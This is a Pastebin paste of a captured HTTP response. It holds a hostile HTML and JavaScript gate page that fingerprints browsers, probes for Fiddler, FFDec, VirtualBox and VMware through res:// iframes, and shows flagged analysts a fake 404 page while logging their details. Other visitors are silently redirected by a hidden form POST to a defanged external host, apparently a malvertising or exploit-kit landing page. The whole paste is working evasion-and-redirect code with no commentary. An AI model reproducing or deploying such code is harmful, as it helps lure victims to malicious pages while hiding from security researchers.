Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- HTTP/1.1 200 OK
- Server: nginx/1.10.1
- Date: Mon, 06 Mar 2017 22:00:15 GMT
- Content-Type: text/html; charset=utf-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- Vary: Accept-Encoding
- X-Powered-By: PHP/5.4.45
- Expires: Thu, 21 Jul 1977 07:30:00 GMT
- Last-Modified: Mon, 06 Mar 2017 22:00:15 GMT
- Cache-Control: max-age=0
- Pragma: no-cache
- ec5
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <title></title>
- <meta charset="UTF-8">
- <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
- <meta name="apple-mobile-web-app-capable" content="yes">
- <meta name="apple-mobile-web-app-status-bar-style" content="black">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- </head>
- <body>
- <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
- <script>
- var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
- var InfoStr = '';
- var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
- var iFrameName = 'myFrame';
- var debug = false;
- var isChecked = 0;
- var appPaths = genPaths();
- function getBrowser() {
- var ua = navigator.userAgent;
- var browsrObj = {
- browser: 'unknown',
- browser_real: '',
- is_bot: false,
- browser_quality: 0,
- platform: 'desktop',
- versionFull: '',
- versionShort: ''
- };
- try{
- var bName = function () {
- if (ua.search(/Edge/) > -1) return "edge";
- if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
- if (ua.search(/Firefox/) > -1) return "firefox";
- if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
- if (ua.search(/YaBrowser/) > -1) return "yabrowser";
- if (ua.search(/Chrome/) > -1) return "chrome";
- if (ua.search(/Safari/) > -1) return "safari";
- if (ua.search(/Maxthon/) > -1) return "maxthon";
- else return "unknown";
- }();
- browsrObj.browser = bName;
- if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
- var version;
- if(bName != 'unknown')
- {
- switch (bName) {
- case "edge":
- version = (ua.split("Edge")[1]).split("/")[1];
- break;
- case "ie":
- if((ua.search(/Trident/) > -1))
- {
- version = (ua.split("; rv:")[1]).split(")")[0];
- }
- else
- {
- version = (ua.split("MSIE ")[1]).split(";")[0];
- }
- break;
- case "firefox":
- version = ua.split("Firefox/")[1];
- break;
- case "opera":
- version = ua.split("Version/")[1];
- break;
- case "operaWebkit":
- bName = "opera";
- version = ua.split("OPR/")[1];
- break;
- case "yabrowser":
- version = (ua.split("YaBrowser/")[1]).split(" ")[0];
- break;
- case "chrome":
- version = (ua.split("Chrome/")[1]).split(" ")[0];
- break;
- case "safari":
- version = (ua.split("Version/")[1]).split(" ")[0];
- break;
- case "maxthon":
- version = ua.split("Maxthon/")[1];
- break;
- }
- browsrObj.versionFull = version;
- browsrObj.versionShort = version.split(".")[0];
- }
- } catch (err) {}
- var w=window,d=document;
- var CorrectBrowser = true;
- var uaBrowser = browsrObj;
- var isIE = isChrome = isFirefox = isOpera = 0;
- if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
- {
- if('ActiveXObject' in window) isIE++;
- if('chrome' in window) isChrome++;
- if('opera' in window) isOpera++;
- if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
- if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
- var f=0;
- f|='sandbox' in d.createElement('iframe')?1:0;
- f|='WebSocket' in w?2:0;
- f|=w.Worker?4:0;
- f|=w.applicationCache?8:0;
- f|=w.history && history.pushState?16:0;
- f|=d.documentElement.webkitRequestFullScreen?32:0;
- f|='FileReader' in w?64:0;
- if(f==0) isIE++;
- if(isIE > 0)
- {
- browsrObj.browser_real = 'ie';
- browsr
- 1000
- Obj.browser_quality = isIE;
- }
- if(isChrome > 1 && isFirefox == 0)
- {
- browsrObj.browser_real = 'chrome';
- browsrObj.browser_quality = isChrome;
- }
- if(isFirefox > 0 && isChrome == 0)
- {
- browsrObj.browser_real = 'firefox';
- browsrObj.browser_quality = isFirefox;
- }
- if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
- }
- InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
- return browsrObj;
- }
- function deb(o) {
- if (!debug) return false;
- console.log(o);
- }
- function getInternetExplorerVersion() {
- var rv = -1;
- if (navigator.appName == 'Microsoft Internet Explorer') {
- var ua = navigator.userAgent;
- var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
- if (re.exec(ua) != null)
- rv = parseFloat( RegExp.$1 );
- } else if (navigator.appName == 'Netscape') {
- var ua = navigator.userAgent;
- var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
- if (re.exec(ua) != null)
- rv = parseFloat( RegExp.$1 );
- }
- return rv;
- }
- function createiFrame(c){
- var d=document.createElement('iframe');
- d.setAttribute('id',iFrameName+c);
- d.setAttribute('name',iFrameName+c);
- d.style['width']='1px'
- d.style['height']='1px';
- function zrs(){objectCheckState(c);}
- function zlo(){countFrameLoaded(c);}
- if (getInternetExplorerVersion()==11) {
- d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
- d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
- } else {
- if(d['addEventListener']){
- d['addEventListener']('readystatechange',zrs,false);
- d['addEventListener']('load',zlo,false);
- }else {
- if(d['attachEvent']){
- d['attachEvent']('on'+'readystatechange',zrs);
- d['attachEvent']('on'+'load',zlo);
- }
- }
- }
- d.setAttribute('src',appPaths[c]['res']);
- document.body.appendChild(d);
- }
- function objectCheckState(c){
- if (getInternetExplorerVersion()==11) {
- if (!appPaths[c]['stateIterate']) appPaths[c]['stateIterate']=1; else appPaths[c]['stateIterate']++;
- }
- var rs = document.getElementById(iFrameName+c).readyState;
- if (!appPaths[c][rs]) appPaths[c][rs]=1; else appPaths[c][rs]++;
- }
- function countFrameLoaded(c){
- var _cfl_appName=appPaths[c]['name'];
- var _cfl_appType=appPaths[c]['type'];
- if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
- foundObjects.push(_cfl_appName);
- } else {
- };
- framesLoaded++;
- if (framesLoaded==appsCount) {
- finishChecking();
- }
- }
- function finishChecking()
- {
- BrowserInfo = getBrowser();
- isChecked++;
- if (foundObjects.length>0) {
- dopStr = 'VM';
- for (i in foundObjects) {
- //dopStr = dopStr+'_'+foundObjects[i];
- }
- InfoStr =InfoStr+dopStr;
- }
- if(BrowserInfo.is_bot == true || foundObjects.length>0)
- {
- document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
- }
- else
- {
- window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
- }
- var b=0;
- for(b=0;b<appsCount;b++){
- deleteiFrame('myFrame'+b);
- }
- }
- function deleteiFrame(c){
- var d=document.getElementById(c);
- d.parentNode.removeChild(d);
- }
- function genPaths() {
- var path_sys32 = '\\Windows\\System32\\drivers\\',
- path_pf = 'C:\\Program Files\\',
- path_pfx86 = 'C:\\Program Files (x86)\\';
- var appPath = [
- {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
- {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
- {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
- /*{name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
- {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
- */
- {na
- 921
- me:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
- {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
- {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
- ];
- var appPathsCompilled = [];
- for(var i=0;i<appPath.length;i++) {
- if (appPath[i]['filetype']=='driver') {
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- }
- if (appPath[i]['filetype']=='pf') {
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- }
- }
- return appPathsCompilled;
- }
- function go()
- {
- foundObjects=[];
- appsCount=appPaths.length;
- framesLoaded=0;
- iFrameObject={};
- for(var c=0;c<appsCount;c++){
- if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
- createiFrame(c);
- }
- if(isChecked == false)
- {
- BrowserInfo = getBrowser();
- if(BrowserInfo.is_bot == true)
- {
- document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
- }
- else
- {
- window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
- //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
- }
- }
- }
- </script>
- 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement